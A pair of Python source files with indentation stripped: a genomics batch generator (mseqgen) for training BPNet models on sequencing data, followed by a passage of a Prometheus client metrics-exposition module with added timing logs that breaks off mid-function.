obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copiesof the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
IGNORE_FOR_SPHINX_DOCS:
"""
import json
import logging
import multiprocessing as mp
import numpy as np
import os
import pandas as pd
import pyBigWig
import pyfaidx
import random
import re
from mseqgen import sequtils
from mseqgen.exceptionhandler import NoTracebackException
from mseqgen import utils
from queue import Queue
from threading import Thread
class MSequenceGenerator:
""" Multi task batch data generation for training deep neural
networks on high-throughput sequencing data of various
geonmics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the two
column pandas dataframe containing the chromosome
position information is passed to the 'samples'
argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
begininning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions" (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation, default = 10
epochs (int): number of iterations for looping over input
data, default = 1
batch_size (int): size of each generated batch of data,
default = 64
samples (pandas.Dataframe): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
**Members**
IGNORE_FOR_SPHINX_DOCS:
_stranded (boolean): True if input data is stranded
_has_control (boolean): True if input data includes
bias/control track
_sampling_mode (str): the mode of sampling chromosome
positions; one of
['peaks', 'sequential', 'random', 'manual'].
_mode (str): 'train', 'val' or 'test'
_tasks (collections.OrderedDict): dictionary of input tasks
taken from input_data json
_num_tasks (int): the number of tasks in 'tasks'
_reference (str): the path to the reference genome fasta
file
_chroms (list): the list of chromosomes that will be sampled
for batch generation
_chrom_sizes_df (pandas.Dataframe): dataframe of the
chromosomes and their corresponding sizes
_num_threads (int): number of parallel threads for batch
generation
_epochs (int): number of iterations for looping over input
data
_batch_size (int): size of each generated batch of data
_input_flank (int): one half of input sequence length
_output_flank (int): one half of output sequence length
_max_jitter (int): the maximum absolute value of jitter to
vary the position of the peak summit to left or right
of the exact center of the input sequence. Range is
-max_jitter to +max_jitter.
_negative_sampling_rate (float): Use a positive value > 0.0
to specify how many negative samples will be added to
each batch. num_negative_samples =
negative_sampling_rate * batch_size. Ignored if
--sampling_mode is not 'peaks', and --mode is not
'train'
_rev_comp_aug (boolean): specify whether reverse complement
augmentation should be applied to each batch of data.
If True, the size of the generated batch is doubled
(i.e batch_size*2 or if negative samples are added then
(batch_size + num_negative_samples)*2). Ignored if
--mode is not 'train'
_shuffle (boolean): if True input data will be shuffled at
the begininning of each epoch
_ready_for_next_epoch (boolean): flag to control batch
generation for the next epoch. The consumer of the
generator is required to send this signal using
'set_ready_for_next_epoch'. This protocol is required
so that excessive and unnecessary batches are not
generated if they will not be consumed
_stop (boolean): flag to indicate that batch generation
should be terminated after the current epoch
_samples (pandas.Dataframe): two column pandas dataframe with
chromosome positions that will be used for generating
batches of data
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads=10, epochs=1, batch_size=64,
samples=None):
#: True if data is stranded
self._stranded = input_config['stranded']
#: True if data has controls
self._has_control = input_config['has_control']
#: ML task mode 'train', 'val' or 'test'
self._mode = batch_gen_params['mode']
#: sampling mode to get chromosome positions
self._sampling_mode = batch_gen_params['sampling_mode']
# make sure the input_data json file exists
if not os.path.isfile(input_config['data']):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.".format(input_config['data']))
# load the json file
with open(input_config['data'], 'r') as inp_json:
try:
#: dictionary of tasks for training
self._tasks = json.loads(inp_json.read())
except json.decoder.JSONDecodeError:
raise NoTracebackException(
"Unable to load json file {}. Valid json expected. "
"Check the file for syntax errors.".format(
input_config['data']))
# check if the reference genome file exists
if not os.path.isfile(reference_genome):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.", reference_genome)
# check if the chrom_sizes file exists
if not os.path.isfile(chrom_sizes):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.".format(chrom_sizes))
#: the number of tasks in _tasks
self._num_tasks = len(list(self._tasks.keys()))
#: path to the reference genome
self._reference = reference_genome
#: dataframe of the chromosomes and their corresponding sizes
self._chrom_sizes_df = pd.read_csv(
chrom_sizes, sep='\t', header=None, names=['chrom', 'size'])
#: list of chromosomes that will be sampled for batch generation
self._chroms = chroms
# keep only those _chrom_sizes_df rows corresponding to the
# required chromosomes in _chroms
self._chrom_sizes_df = self._chrom_sizes_df[
self._chrom_sizes_df['chrom'].isin(self._chroms)]
# generate a new column for sampling weights of the chromosomes
self._chrom_sizes_df['weights'] = \
(self._chrom_sizes_df['size'] / self._chrom_sizes_df['size'].sum())
#: number of parallel threads for batch generation
self._num_threads = num_threads
#: number of iterations for looping over input data
self._epochs = epochs
#: size of each generated batch of data
self._batch_size = batch_size
# rest of batch generation parameters
#: int:one half of input sequence length
self._input_flank = batch_gen_params['input_seq_len'] // 2
#: one half of input sequence length
self._output_flank = batch_gen_params['output_len'] // 2
#: the maximum absolute value of jitter to vary the position
#: of the peak summit to left or right of the exact center
#: of the input sequence. Range is -max_jitter to +max_jitter.
self._max_jitter = batch_gen_params['max_jitter']
#: Use a positive value > 0.0 to specify how many negative
#: samples will be added to each batch. num_negative_samples =
#: negative_sampling_rate * batch_size. Ignored if
#: --sampling_mode is not 'peaks', and --mode is not 'train'
self._negative_sampling_rate = \
batch_gen_params['negative_sampling_rate']
#: if True, reverse complement augmentation will be applied to
#: each batch of data. The size of the generated batch is
#: doubled (i.e batch_size*2 or if negative samples are added
#: then (batch_size + num_negative_samples)*2). Ignored if
#: --mode is not 'train'
self._rev_comp_aug = batch_gen_params['rev_comp_aug']
#: if True, shuffle the data before the beginning of the epoch
self._shuffle = batch_gen_params['shuffle']
if self._sampling_mode == 'peaks':
# get a pandas dataframe for the peak positions
# Note - we need the 'tasks' dictionary so we can access
# the peaks.bed files from the paths available in the
# dictionary
self._samples = sequtils.getPeakPositions(
self._tasks, self._chroms,
self._chrom_sizes_df[['chrom', 'size']], self._input_flank,
drop_duplicates=True)
elif self._sampling_mode == 'sequential':
if 'num_positions' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'num_positions'. "
"Required for sequential sampling mode")
if 'step_size' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'step_size'. "
"Required for sequential sampling mode")
# get a pandas dataframe with sequential positions at
# regular intervals
self._samples = sequtils.getChromPositions(
self._chroms, self._chrom_sizes_df[['chrom', 'size']],
self._input_flank, mode=self._sampling_mode,
num_positions=batch_gen_params['num_positions'],
step=batch_gen_params['step_size'])
# since the positions are fixed and equally spaced we
# wont jitter
self._max_jitter = 0
elif self._sampling_mode == 'random':
if 'num_positions' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'num_positions'. "
"Required for random sampling mode")
# get a pandas dataframe with random positions
self._samples = sequtils.getChromPositions(
self._chroms, self._chrom_sizes_df[['chrom', 'size']],
self._input_flank, mode=self._sampling_mode,
num_positions=batch_gen_params['num_positions'])
# its already random, why jitter?!
self._max_jitter = 0
elif self._sampling_mode == 'manual':
# check if the samples parameter has been provided
if samples is None:
raise NoTracebackException(
"If sampling_mode is 'manual', 'samples' parameter"
"has to be set. Found None.")
if not isinstance(samples, pandas.Dataframe) or \
set(samples.columns.tolist()) != set(['chrom', 'pos']):
raise NoTracebackException(
"samples' parameter should be a valid pandas.Dataframe"
"with two columns 'chrom' and 'pos'")
#: two column pandas dataframe with chromosome positions,
#: columns = ['chrom', 'pos']
self._samples = samples
#: size of the input samples before padding
self._unpadded_samples_size = len(self._samples)
# pad self._samples dataframe with randomly selected rows
# so that the length of the dataframe is an exact multiple of
# num_threads * batch_size. We do this so we can equally divide
# the batches across several batch generation threads
exact_multiple = sequtils.round_to_multiple(
len(self._samples), num_threads * batch_size, smallest=True)
pad_size = exact_multiple - len(self._samples)
if pad_size > 0:
# If the pad_size > #self._samples, then number of data
# samples for the set (train or val) is significantly less
# than num_threads * batch_size, so we'll have to sample
# the padded rows with replacement
replace = False
if pad_size > len(self._samples):
replace = True
logging.info("mode '{}': Sampling with replacement for "
"data padding")
self._samples = self._samples.append(
self._samples.sample(pad_size, replace=replace),
ignore_index=True)
#: size of the input samples after padding
self._samples_size = len(self._samples)
logging.info("mode '{}': Data size (with {} padded rows) - {}".format(
self._mode, pad_size, len(self._samples)))
def get_input_tasks(self):
"""
The dictionary of tasks loaded from the json file
input_config['data']
Returns:
dict: dictionary of input tasks
"""
return self._tasks
def get_unpadded_samples_len(self):
"""
The number of data samples before padding
Returns:
int: number of data samples before padding
"""
return self._unpadded_samples_size
def get_samples_len(self):
"""
The number of data samples used in batch generation
(after padding)
Returns:
int: number of data samples used in batch generation
"""
return self._samples_size
def len(self):
"""
The number of batches per epoch
Returns:
int: number of batches of data generated in each epoch
"""
return self._samples.shape[0] // self._batch_size
def _generate_batch(self, coords):
"""
Generate one batch of inputs and outputs
"""
raise NotImplementedError("Method not implemented. Used a "
"derived class.")
def get_name(self):
"""
Name of the sequence generator
"""
raise NotImplementedError("Method not implemented. Used a "
"derived class.")
def _get_negative_batch(self):
"""
Get chrom positions for the negative samples using
uniform random sampling from across the all chromosomes
in self._chroms
Returns:
pandas.DataFrame:
two column dataframe of chromosome positions with
'chrom' & 'pos' columns
"""
# Step 1: select chromosomes, using sampling weights
# according to sizes
chrom_df = self._chrom_sizes_df.sample(
n=int(self._batch_size * self._negative_sampling_rate),
weights=self._chrom_sizes_df.weights, replace=True)
# Step 2: generate 'n' random numbers where 'n' is the length
# of chrom_df
r = [random.random() for _ in range(chrom_df.shape[0])]
# Step 3. multiply the random numbers with the size column.
# Additionally, factor in the flank size and jitter while
# computing the position
chrom_df['pos'] = ((chrom_df['size'] - ((self._input_flank
+ self._max_jitter) * 2))
* r + self._input_flank
+ self._max_jitter).astype(int)
return chrom_df[['chrom', 'pos']]
def _proc_target(self, coords_df, mpq, proc_idx):
"""
Function that will be executed in a separate process.
Takes a dataframe of peak coordinates and parses them in
batches, to get one hot encoded sequences and corresponding
outputs, and adds the batches to the multiprocessing queue.
Optionally, samples negative locations and adds them to
each batch
Args:
coords_df (pandas.DataFrame): dataframe containing
the chrom & peak pos
mpq (multiprocessing.Queue): The multiprocessing queue
to hold the batches
"""
# divide the coordinates dataframe into batches
cnt = 0
for i in range(0, coords_df.shape[0], self._batch_size):
# we need to make sure we dont try to fetch
# data beyond the length of the dataframe
if (i + self._batch_size) > coords_df.shape[0]:
break
batch_df = coords_df.iloc[i:i + self._batch_size]
batch_df = batch_df.copy()
batch_df['status'] = 1
# add equal number of negative samples
if self._mode == "train" and \
self._sampling_mode == 'peaks' and \
self._negative_sampling_rate > 0.0:
neg_batch = self._get_negative_batch()
neg_batch['status'] = -1
batch_df = pd.concat([batch_df, neg_batch])
# generate a batch of one hot encoded sequences and
# corresponding outputs
batch = self._generate_batch(batch_df)
# add batch to the multiprocessing queue
mpq.put(batch)
cnt += 1
logging.debug("{} process {} put {} batches into mpq".format(
self._mode, proc_idx, cnt))
def _stealer(self, mpq, q, num_batches, thread_id):
"""
Thread target function to "get" (steal) from the
multiprocessing queue and "put" in the regular queue
Args:
mpq (multiprocessing.Queue): The multiprocessing queue
to steal from
q (Queue): The regular queue to put the batch into
num_batches (int): the number of batches to "steal"
from the mp queue
thread_id (int): thread id for debugging purposes
"""
for i in range(num_batches):
q.put(mpq.get())
logging.debug("{} stealer thread {} got {} batches from mpq".format(
self._mode, thread_id, num_batches))
def _epoch_run(self, data):
"""
Manage batch generation processes & threads
for one epoch
Args:
data (pandas.DataFrame): dataframe with 'chrom' &
'pos' columns
"""
# list of processes that are spawned
procs = []
# list of multiprocessing queues corresponding to each
# process
mp_queues = []
# list of stealer threads (that steal the items out of
# the mp queues)
threads = []
# the regular queue
q = Queue()
# to make sure we dont flood the user with warning messages
warning_dispatched = False
# number of data samples to assign to each processor
# (since we have already padded data len(data) is directly
# divisible by num_threads)
samples_per_processor = int(len(data) / self._num_threads)
# batches that will be generated by each process thread
num_batches = []
# spawn processes that will generate batches of data and "put"
# into the multiprocessing queues
for i in range(self._num_threads):
mpq = mp.Queue()
# give each process a slice of the dataframe of positives
df = data[i * samples_per_processor:
(i + 1) * samples_per_processor][['chrom', 'pos']]
# the last process gets the leftover data points
if i == (self._num_threads - 1):
df = pd.concat([df, data[(i + 1) * samples_per_processor:]])
num_batches.append(len(df) // self._batch_size)
if df.shape[0] != 0:
logging.debug("{} spawning process {}, df size {}, "
"sum(num_batches) {}".format(
self._mode, i, df.shape, sum(num_batches)))
# spawn and start the batch generation process
p = mp.Process(target=self._proc_target, args=[df, mpq, i])
p.start()
procs.append(p)
mp_queues.append(mpq)
else:
if not warning_dispatched:
logging.warn("One or more process threads are not being "
"assigned data for parallel batch "
"generation. You should reduce the number "
"of threads using the --threads option "
"for better performance. Inspect logs for "
"batch assignments.")
warning_dispatched = True
logging.debug("{} skipping process {}, df size {}, "
"num_batches {}".format(
self._mode, i, df.shape, sum(num_batches)))
procs.append(None)
mp_queues.append(None)
logging.debug("{} num_batches list {}".format(self._mode,
num_batches))
# the threads that will "get" from mp queues
# and put into the regular queue
# this speeds up yielding of batches, because "get"
# from mp queue is very slow
for i in range(self._num_threads):
# start a stealer thread only if data was assigned to
# the i-th process
if num_batches[i] > 0:
logging.debug("{} starting stealer thread {} [{}] ".format(
self._mode, i, num_batches[i]))
mp_q = mp_queues[i]
stealerThread = Thread(target=self._stealer,
args=[mp_q, q, num_batches[i], i])
stealerThread.start()
threads.append(stealerThread)
else:
threads.append(None)
logging.debug("{} skipping stealer thread {} ".format(
self._mode, i, num_batches))
return procs, threads, q, sum(num_batches)
def gen(self, epoch):
"""
Generator function to yield one batch of data
Args:
epoch (int): the epoch number
"""
if self._shuffle:
# shuffle at the beginning of each epoch
data = self._samples.sample(frac=1.0)
logging.debug("{} Shuffling complete".format(self._mode))
else:
data = self._samples
# spawn multiple processes to generate batches of data in
# parallel for each epoch
procs, threads, q, total_batches = self._epoch_run(data)
logging.debug("{} Batch generation for epoch {} started".format(
self._mode, epoch))
# yield the correct number of batches for each epoch
for j in range(total_batches):
batch = q.get()
yield batch
# wait for batch generation processes to finish once the
# required number of batches have been yielded
for j in range(self._num_threads):
if procs[j] is not None:
logging.debug("{} waiting to join process {}".format(
self._mode, j))
procs[j].join()
if threads[j] is not None:
logging.debug("{} waiting to join thread {}".format(
self._mode, j))
threads[j].join()
logging.debug("{} join complete for process {}".format(
self._mode, j))
logging.debug("{} Finished join for epoch {}".format(
self._mode, epoch))
logging.debug("{} Ready for next epoch".format(self._mode))
class MBPNetSequenceGenerator(MSequenceGenerator):
"""
Multi task batch data generation for training BPNet
on high-throughput sequencing data of various
geonmics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the bed
file containing the chromosome position information
is passed to the 'samples' argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
begininning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions" (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation
epochs (int): number of iterations for looping over input
data
batch_size (int): size of each generated batch of data
samples (pandas.Dataframe): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
kwargs (dictionary): python dictionary containing
parameters specific to BPNet. Contains the following
keys -
*name (str)*
model architecture name
*filters (int)*
number of filters for BPNet
*control_smoothing (list)*
nested list of gaussiam smoothing parameters. Each
inner list has two values - [sigma, window_size] for
supplemental control tracks
**Members**
IGNORE_FOR_SPHINX_DOCS:
Attributes:
_control_smoothing (list): nested list of gaussiam smoothing
parameters. Each inner list has two values -
[sigma, window_size] for supplemental control tracks
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads=10, epochs=100,
batch_size=64, samples=None, **kwargs):
# name of the generator class
self.name = "BPNet"
# call base class constructor
super().__init__(input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads, epochs, batch_size,
samples)
if 'control_smoothing' not in kwargs:
raise NoTracebackException(
"Key not Found: missing 'control_smoothing' parameter")
#: nested list of gaussiam smoothing parameters. Each inner list
#: has two values - [sigma, window_size] for supplemental
#: control control tracks
self._control_smoothing = kwargs['control_smoothing']
def _generate_batch(self, coords):
"""Generate one batch of inputs and outputs for training BPNet
For all coordinates in "coords" fetch sequences &
one hot encode the sequences. Fetch corresponding
signal values (for e.g. from a bigwig file).
Package the one hot encoded sequences and the output
values as a tuple.
Args:
coords (pandas.DataFrame): dataframe with 'chrom',
'pos' & 'status' columns specifying the chromosome,
thecoordinate and whether the loci is a positive(1)
or negative sample(-1)
Returns:
tuple:
When 'mode' is 'train' or 'val' a batch tuple
with one hot encoded sequences and corresponding
outputs and when 'mode' is 'test' tuple of
cordinates & the inputs
"""
# reference file to fetch sequences
fasta_ref = pyfaidx.Fasta(self._reference)
# Initialization
# (batch_size, output_len, 1 + #smoothing_window_sizes)
control_profile = np.zeros((coords.shape[0], self._output_flank * 2,
1 + len(self._control_smoothing)),
dtype=np.float32)
# (batch_size)
control_profile_counts = np.zeros((coords.shape[0]),
dtype=np.float32)
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# (batch_size, output_len, #tasks)
profile = np.zeros((coords.shape[0], self._output_flank * 2,
self._num_tasks), dtype=np.float32)
# (batch_size, #tasks)
profile_counts = np.zeros((coords.shape[0], self._num_tasks),
dtype=np.float32)
# if reverse complement augmentation is enabled then double the sizes
if self._mode == "train" and self._rev_comp_aug:
control_profile = control_profile.repeat(2, axis=0)
control_profile_counts = control_profile_counts.repeat(2, axis=0)
profile = profile.repeat(2, axis=0)
profile_counts = profile_counts.repeat(2, axis=0)
# list of sequences in the batch, these will be one hot
# encoded together as a single sequence after iterating
# over the batch
sequences = []
# list of chromosome start/end coordinates
# useful for tracking test batches
coordinates = []
# open all the control bigwig files and store the file
# objects in a dictionary
control_files = {}
for task in self._tasks:
# the control is not necessary
if 'control' in self._tasks[task]:
control_files[task] = pyBigWig.open(
self._tasks[task]['control'])
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# open all the required bigwig files and store the file
# objects in a dictionary
signal_files = {}
for task in self._tasks:
signal_files[task] = pyBigWig.open(self._tasks[task]['signal'])
# iterate over the batch
rowCnt = 0
for _, row in coords.iterrows():
# randomly set a jitter value to move the peak summit
# slightly away from the exact center
jitter = 0
if self._mode == "train" and self._max_jitter:
jitter = random.randint(-self._max_jitter, self._max_jitter)
# Step 1 get the sequence
chrom = row['chrom']
# we use self._input_flank here and not self._output_flank because
# input_seq_len is different from output_len
start = row['pos'] - self._input_flank + jitter
end = row['pos'] + self._input_flank + jitter
seq = fasta_ref[chrom][start:end].seq.upper()
# collect all the sequences into a list
sequences.append(seq)
start = row['pos'] - self._output_flank + jitter
end = row['pos'] + self._output_flank + jitter
# collect all the start/end coordinates into a list
# we'll send this off along with 'test' batches
coordinates.append((chrom, start, end))
# iterate over each task
for task in self._tasks:
# identifies the +/- strand pair
task_id = self._tasks[task]['task_id']
# the strand id: 0-positive, 1-negative
# easy to index with those values
strand = self._tasks[task]['strand']
# Step 2. get the control values
if task in control_files:
control_values = control_files[task].values(
chrom, start, end)
# replace nans with zeros
if np.any(np.isnan(control_values)):
control_values = np.nan_to_num(control_values)
# update row in batch with the control values
# the values are summed across all tasks
# the axis = 1 dimension accumulates the sum
# there are 'n' copies of the sum along axis = 2,
# n = #smoothing_windows
control_profile[rowCnt, :, :] += np.expand_dims(
control_values, axis=1)
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# Step 3. get the signal values
# fetch values using the pyBigWig file objects
values = signal_files[task].values(chrom, start, end)
# replace nans with zeros
if np.any(np.isnan(values)):
values = np.nan_to_num(values)
# update row in batch with the signal values
if self._stranded:
profile[rowCnt, :, task_id * 2 + strand] = values
else:
profile[rowCnt, :, task_id] = values
rowCnt += 1
# Step 4. reverse complement augmentation
if self._mode == "train" and self._rev_comp_aug:
# Step 4.1 get list of reverse complement sequences
rev_comp_sequences = \
sequtils.reverse_complement_of_sequences(sequences)
# append the rev comp sequences to the original list
sequences.extend(rev_comp_sequences)
# Step 4.2 reverse complement of the control profile
control_profile[rowCnt:, :, :] = \
sequtils.reverse_complement_of_profiles(
control_profile[:rowCnt, :, :], self._stranded)
# Step 4.3 reverse complement of the signal profile
profile[rowCnt:, :, :] = \
sequtils.reverse_complement_of_profiles(
profile[:rowCnt, :, :], self._stranded)
# Step 5. one hot encode all the sequences in the batch
if len(sequences) == profile.shape[0]:
X = sequtils.one_hot_encode(sequences, self._input_flank * 2)
else:
raise NoTracebackException(
"Unable to generate enough sequences for the batch")
# we can perform smoothing on the entire batch of control values
for i in range(len(self._control_smoothing)):
sigma = self._control_smoothing[i][0]
window_size = self._control_smoothing[i][1]
# its i+1 because at index 0 we have the original
# control
control_profile[:, :, i + 1] = utils.gaussian1D_smoothing(
control_profile[:, :, i + 1], sigma, window_size)
# log of sum of control profile without smoothing (idx = 0)
control_profile_counts = np.log(
np.sum(control_profile[:, :, 0], axis=-1) + 1)
# in 'train' and 'val' mode we need input and output
# dictionaries
if self._mode == "train" or self._mode == 'val':
# we can now sum the profiles for the entire batch
profile_counts = np.log(np.sum(profile, axis=1) + 1)
# return a tuple of input and output dictionaries
# 'coordinates' and 'status are not inputs to the model,
# so you will see a warning about unused inputs while
# training. It's safe to ignore the warning
# We pass 'coordinates' so we can track the exact
# coordinates of the inputs (because jitter is random)
# 'status' refers to whether the data sample is a +ve (1)
# or -ve (-1) example and is used by the attribution
# prior loss function
return ({#'coordinates': coordinates,
'status': coords['status'].values,
'sequence': X,
'control_profile': control_profile,
'control_logcount': control_profile_counts},
{'profile_predictions': profile,
'logcount_predictions': profile_counts})
# in 'test' mode return a tuple of cordinates, true profiles
# & the input dictionary
return (coordinates, profile,
{'sequence': X,
'control_profile': control_profile,
'control_logcount': control_profile_counts})
def list_generator_names():
"""
List all available sequence generators that are derived
classes of the base class MSequenceGenerator
Returns:
list: list of sequence generator names
"""
generator_names = []
for c in MSequenceGenerator.__subclasses__():
result = re.search('M(.*)SequenceGenerator', c.__name__)
generator_names.append(result.group(1))
return generator_names
def find_generator_by_name(generator_name):
"""
Get the sequence generator class name given its name
Returns:
str: sequence generator class name
"""
for c in MSequenceGenerator.__subclasses__():
result = re.search('M(.*)SequenceGenerator', c.__name__)
if generator_name == result.group(1):
return c.__name__
|
exposition.py
|
import base64
from contextlib import closing
from http.server import BaseHTTPRequestHandler
import os
import socket
from socketserver import ThreadingMixIn
import sys
import threading
import logging
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import (
build_opener, HTTPHandler, HTTPRedirectHandler, Request,
)
from wsgiref.simple_server import make_server, WSGIRequestHandler, WSGIServer
from datetime import datetime
from .openmetrics import exposition as openmetrics
from .registry import REGISTRY
from .utils import floatToGoString
logger = logging.getLogger(__name__)
CONTENT_TYPE_LATEST = 'text/plain; version=0.0.4; charset=utf-8'
"""Content type of the latest text format"""
PYTHON376_OR_NEWER = sys.version_info > (3, 7, 5)
class _PrometheusRedirectHandler(HTTPRedirectHandler):
"""
Allow additional methods (e.g. PUT) and data forwarding in redirects.
Use of this class constitute a user's explicit agreement to the
redirect responses the Prometheus client will receive when using it.
You should only use this class if you control or otherwise trust the
redirect behavior involved and are certain it is safe to full transfer
the original request (method and data) to the redirected URL. For
example, if you know there is a cosmetic URL redirect in front of a
local deployment of a Prometheus server, and all redirects are safe,
this is the class to use to handle redirects in that case.
The standard HTTPRedirectHandler does not forward request data nor
does it allow redirected PUT requests (which Prometheus uses for some
operations, for example `push_to_gateway`) because these cannot
generically guarantee no violations of HTTP RFC 2616 requirements for
the user to explicitly confirm redirects that could have unexpected
side effects (such as rendering a PUT request non-idempotent or
creating multiple resources not named in the original request).
"""
def redirect_request(self, req, fp, code, msg, headers, newurl):
"""
Apply redirect logic to a request.
See parent HTTPRedirectHandler.redirect_request for parameter info.
If the redirect is disallowed, this raises the corresponding HTTP error.
If the redirect can't be determined, return None to allow other handlers
to try. If the redirect is allowed, return the new request.
This method specialized for the case when (a) the user knows that the
redirect will not cause unacceptable side effects for any request method,
and (b) the user knows that any request data should be passed through to
the redirect. If either condition is not met, this should not be used.
"""
# note that requests being provided by a handler will use get_method to
# indicate the method, by monkeypatching this, instead of setting the
# Request object's method attribute.
m = getattr(req, "method", req.get_method())
if not (code in (301, 302, 303, 307) and m in ("GET", "HEAD")
or code in (301, 302, 303) and m in ("POST", "PUT")):
raise HTTPError(req.full_url, code, msg, headers, fp)
new_request = Request(
newurl.replace(' ', '%20'), # space escaping in new url if needed.
headers=req.headers,
origin_req_host=req.origin_req_host,
unverifiable=True,
data=req.data,
)
new_request.method = m
return new_request
def _bake_output(registry, accept_header, params):
"""Bake output for metrics output."""
logger.warning("{} start choose encoder".format(get_time()))
encoder, content_type = choose_encoder(accept_header)
logger.warning("{} choose encoder done".format(get_time()))
if 'name[]' in params:
registry = registry.restricted_registry(params['name[]'])
logger.warning("{} start encoder".format(get_time()))
output = encoder(registry)
logger.warning("{} encoder done".format(get_time()))
return '200 OK', ('Content-Type', content_type), output
def make_wsgi_app(registry=REGISTRY):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
# Prepare parameters
logger.warning("{} get request".format(get_time()))
accept_header = environ.get('HTTP_ACCEPT')
params = parse_qs(environ.get('QUERY_STRING', ''))
if environ['PATH_INFO'] == '/favicon.ico':
# Serve empty response for browsers
status = '200 OK'
header = ('', '')
output = b''
else:
# Bake output
logger.warning("{} ready to bake output".format(get_time()))
status, header, output = _bake_output(registry, accept_header, params)
logger.warning("{} bake output done".format(get_time()))
# Return output
logger.warning("{} start response".format(get_time()))
start_response(status, [header])
logger.warning("{} response done".format(get_time()))
return [output]
return prometheus_app
def get_time():
return datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
logger.warning("{} {}:{} {} {} {}".format(get_time(),*self.client_address,*args))
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
daemon_threads = True
def start_wsgi_server(port, addr='', registry=REGISTRY):
